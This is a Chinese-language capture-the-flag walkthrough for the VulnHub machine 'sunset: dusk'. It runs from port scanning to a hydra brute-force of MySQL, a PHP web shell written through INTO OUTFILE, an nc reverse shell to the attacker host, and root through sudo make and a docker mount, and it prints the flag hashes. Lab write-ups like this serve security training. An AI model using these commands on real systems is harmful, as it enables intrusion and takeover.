貓寧~~~
地址:https://www.vulnhub.com/entry/sunset-dusk,404/
重點關注工具和思路。
nmap 192.168.43.0/24
靶機IP
192.168.43.200
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
nmap -A -p1-65535 192.168.43.200,關注各個系統服務的版本漏洞
訪問http://192.168.43.200:8080/,http://192.168.43.200/
成功,賬戶密碼root/password
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.43.200 mysql
進入數據庫
mysql -h 192.168.43.200 -u root -P 3306 -p
select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/muma.php' ;
http://192.168.43.200:8080/中可以看到muma.php,所在目錄是/var/tmp
http://192.168.43.200:8080/muma.php?cmd=id
http://192.168.43.200:8080/raj.php?cmd=nc%20-e%20/bin/bash%20192.168.43.154%204444
nc -e /bin/bash 192.168.43.154 4444
攻擊機nc -lvnp 4444
獲得shell
python -c 'import pty;pty.spawn("/bin/bash")'
sudo -l
(dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
提權到dusk用戶
sudo -u dusk make --eval=$'x:\n\t'/bin/bash
家目錄
cat user.txt
08ebacf8f4e43f05b8b8b372df24235b
docker images
docker pull alpine
docker run -v /:/mnt -it alpine
獲取了root權限
cd /mnt/root
cat root.txt
8930fa079a510ee880fe047d40dc613e